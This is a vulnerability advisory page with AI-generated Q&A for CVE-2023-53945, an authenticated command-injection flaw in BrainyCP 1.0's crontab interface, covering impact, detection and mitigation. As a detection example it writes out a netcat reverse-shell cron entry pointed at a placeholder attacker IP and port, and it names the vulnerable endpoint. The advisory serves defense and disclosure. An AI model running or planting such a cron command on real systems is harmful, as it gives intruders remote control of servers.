CVE-2023-53945
Authenticated Remote Code Execution via Crontab in BrainyCP
Publication date: 2025-12-19
Last updated on: 2025-12-19
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| brainycp | brainycp | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2023-53945 is an authenticated remote code execution vulnerability in BrainyCP version 1.0. It allows logged-in users to inject arbitrary OS commands through the crontab configuration interface. Attackers can exploit this by adding a malicious cron job that executes commands such as spawning a reverse shell to a specified IP and port, enabling remote control of the affected system. [1, 2]
How can this vulnerability impact me? :
This vulnerability can allow an authenticated attacker to execute arbitrary commands on your server remotely. By injecting malicious cron jobs, an attacker can gain remote shell access, potentially leading to full system compromise, data theft, service disruption, or further attacks within your network. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking the crontab entries for any suspicious or unauthorized commands, especially those that spawn reverse shells using netcat (nc). You can inspect the cron jobs configured via the BrainyCP crontab interface. For example, on the server, run the command `crontab -l` for the affected user to list cron jobs and look for entries like `* * * * * nc <attacker_ip> <attacker_port> -e /bin/bash`. Additionally, monitoring HTTP POST requests to the endpoint `/index.php?do=crontab&subdo=ajax&subaction=addcron` can help detect attempts to add malicious cron jobs. Network monitoring tools can also be used to detect outgoing connections to suspicious IP addresses and ports that may indicate reverse shell activity. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the BrainyCP crontab configuration interface to trusted users only, ensuring that only authorized and authenticated users can add or modify cron jobs. Apply strict input validation and sanitization on the crontab interface to prevent command injection. If possible, update BrainyCP to a version where this vulnerability is fixed. As a temporary measure, monitor and remove any suspicious cron jobs that execute reverse shell commands. Additionally, consider network-level controls such as firewall rules to block outgoing connections to untrusted IP addresses and ports commonly used for reverse shells. [1, 2]